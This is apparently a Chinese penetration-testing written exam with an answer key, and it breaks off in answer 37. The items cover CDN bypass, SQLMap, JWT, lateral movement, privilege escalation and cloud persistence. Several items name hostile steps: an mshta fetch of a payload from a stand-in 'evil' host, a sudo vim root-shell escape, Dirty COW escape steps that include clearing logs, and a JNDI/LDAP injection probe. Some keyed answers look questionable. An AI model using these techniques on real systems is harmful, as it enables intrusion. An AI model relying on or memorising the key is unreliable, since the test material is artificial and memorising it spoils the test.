2026年渗透测试题笔试及答案

2026年渗透测试题笔试及答案

一、单项选择题（每题2分，共20分）1.在渗透测试信息收集阶段，以下哪一条命令可直接判断目标域是否启用CDN且获取真实IP概率最高？A.nslookup域名B.dig域名A记录C.多地ping域名D.whois域名2.利用SQLMap进行布尔盲注时，为提高时间效率并降低触发WAF风险，应优先选用的参数组合是：A.--technique=B--threads=10B.--technique=E--time-sec=1C.--technique=T--level=5D.--technique=U--risk=33.针对采用JWT鉴权的API接口，下列哪种攻击方式最可能直接绕过签名验证？A.修改alg为noneB.暴力破解HS256密钥C.利用kid字段路径穿越D.重放他人token4.在横向移动阶段，利用Windows系统自带工具完成远程命令执行且不触发常见EDR行为检测的最佳选项是：A.wmicprocesscallcreateB.sc\\targetcreatebinPath=cmdC.mshtahttp://evil/payload.htaD.powershell-encbase64code5.当目标内网部署了802.1X端口认证，攻击者欲通过交换机进行流量截获，最需优先突破的环节是：A.获取合法用户证书B.欺骗MAC地址C.攻击RADIUS服务器D.启用混杂模式6.以下哪项技术可有效防御服务器端模板注入（SSTI）漏洞？A.启用WAF规则“update”关键词过滤B.沙箱化模板引擎执行环境C.对输入进行htmlspecialchars编码D.关闭模板缓存7.在Linux提权过程中，通过内核漏洞进行提权前必须首先确认：A.当前用户UIDB.内核版本与架构C.SELinux状态D.磁盘剩余空间8.对采用HSTS预加载策略的站点实施中间人攻击，最可行的绕过思路是：A.降级HTTPS到HTTPB.利用SSLStrip2C.伪造上级根证书D.劫持NTP修改时间9.使用Metasploit进行后渗透时，若想在内网没有路由的情况下访问目标隔离网段，应优先加载的模块是：A.post/windows/manage/enable_rdpB.post/windows/manage/inject_hostC.post/windows/manage/autorouteD.post/windows/gather/arp_scanner10.在移动端渗透测试中，对采用Flutter框架开发的Android应用进行逆向，最需关注的关键文件是：A.classes.dexB.libapp.soC.AndroidManifest.xmlD.resources.arsc二、填空题（每题2分，共20分）11.在HTTP头中利用________字段可绕过基于Content-Type的上传限制，实现WebShell上传。12.当MySQL数据库secure_file_priv值为________时，无法使用LOAD_FILE或INTOOUTFILE进行文件读写。13.在Windows日志中，事件ID________通常记录用户成功登录类型为3的网络登录。14.利用________工具可对AndroidAPK进行动态插桩，无需Root即可HookJava层函数。15.在渗透测试报告中，CVSSv3.1评分由________、攻击复杂度、所需权限等8项指标计算得出。16.通过________协议可对网络打印机进行未授权访问并提取打印任务中的敏感信息。17.在Linux环境，若/etc/sudoers中存在(ALL)NOPASSWD:/usr/bin/vim，则可通过vim内执行________命令获取rootshell。18.针对GraphQL接口的DoS攻击，常利用________查询特性造成数据库笛卡尔积爆炸。19.在IPv6无状态地址自动分配场景下，通过伪造________报文可实施中间人拦截。20.在二进制漏洞利用中，ASLR机制随机化的是________段、堆与栈的基地址。三、判断题（每题2分，共20分）21.使用Dirb扫描时，添加-X参数可指定字典文件后缀，提高发现备份文件效率。22.在Kubernetes集群中，默认ServiceAccount拥有对全部命名空间的listsecrets权限。23.对HTTPS站点进行证书透明度查询，可通过crt.sh获取子域名信息。24.在WindowsDefender默认配置下，msbuild.exe执行内嵌C代码一定会被拦截。25.利用XXE漏洞读取文件时，若目标主机出网，可将文件内容作为HTTP参数带出。26.在iOS应用沙箱中，AppGroup容器可被同一开发者证书下的不同应用共享。27.对采用OAuth2授权码模式的站点，只要获取authorizationcode即可直接拿到accesstoken，无需client_secret。28.在Linux中，若/etc/shadow文件权限被误设为644，则任意用户可读取哈希并离线破解。29.使用BloodHound分析域环境时，边缘属性“AddMember”表示可将对象加入目标组。30.在无线渗透中，WPA3-SAE握手可通过捕获一次握手包离线暴力破解密码。四、简答题（每题5分，共20分）31.简述在域环境中利用Kerberoasting攻击获取服务账号凭据的流程，并给出两条防御建议。32.说明针对RESTfulAPI的IDOR漏洞检测思路，并指出自动化扫描时易产生的误报原因。33.概述在Linux容器逃逸场景下，利用dirtycow（CVE-2016-5195）完成逃逸的核心步骤。34.描述在Android应用中使用Frida绕过SSLPinning的通用脚本思路，并指出可能失效的两种情况。五、讨论题（每题5分，共20分）35.结合ATT&CK框架，讨论APT组织在初始访问阶段使用“水坑攻击”的技术要点与检测难点，并提出三层防御方案。36.针对零信任网络架构，分析传统内网渗透“先横向再提权”模型面临的挑战，并提出渗透测试方法学的调整方向。37.在DevSecOps流水线中，如何将SAST、DAST与RASP进行协同，以在上线前发现Log4Shell类漏洞并阻断利用？请给出流程图文字描述与关键检查点。38.当目标关键业务全面上云并采用Serverless架构后，传统后渗透持久化手段失效，讨论新型持久化技术（如LambdaLayer、CloudWatchEvents）的利用与防御平衡。答案与解析一、单项选择题1.C2.A3.A4.A5.A6.B7.B8.C9.C10.B二、填空题11.Content-Disposition12.NULL13.462414.Frida15.攻击向量16.PJL/910017.:!/bin/sh18.嵌套片段（fragment）19.RouterAdvertisement20.映像三、判断题21.√22.×23.√24.×25.√26.√27.×28.√29.√30.×四、简答题31.流程：1.扫描SPN获取高权限服务账号；2.请求TGS票据；3.离线暴力破解。防御：1.设置强密码策略（25位随机含特殊字符）；2.启用AES-256加密并定期轮换密钥。32.检测：1.替换身份标识参数观察返回差异；2.使用两个低权限账号交叉访问。误报：1.功能本身允许同级数据共享；2.参数虽可遍历但后端额外权限校验。33.步骤：1.容器内编译POC；2.触发racecondition写/etc/passwd添加uid=0用户；3.ssh/su进入宿主机；4.清理日志。34.思路：1.枚举libssl.so符号；2.替换SSL_CTX_set_custom_verify返回0；3.重打包或内存补丁。失效：1.使用自定义SSL库并校验证书指纹；2.启用App级双重校验与反调试。五、讨论题35.要点：1.攻陷目标常访合法站点；2.植入js或下载器精准筛选IP；3.利用1-day无文件加载。检测难：流量加密、生命周期短。防御：1.外包站点持续基线监控；2.浏览器ESM日志上传SIEM；3.终端EDR行为阻断。36.挑战：1.无固定网络边界；2.微隔离阻断横向；3.身份即边界。调整：1.以身份为入口聚焦凭证钓鱼；2.评估控制面API成为新横向通道；3.采用攻击路径图计算最小爆炸半径。37.流程：提交代码→SAST扫描依赖树发现JNDI接口→触发DAST主动注入${jndi:ldap://test}探测→RASP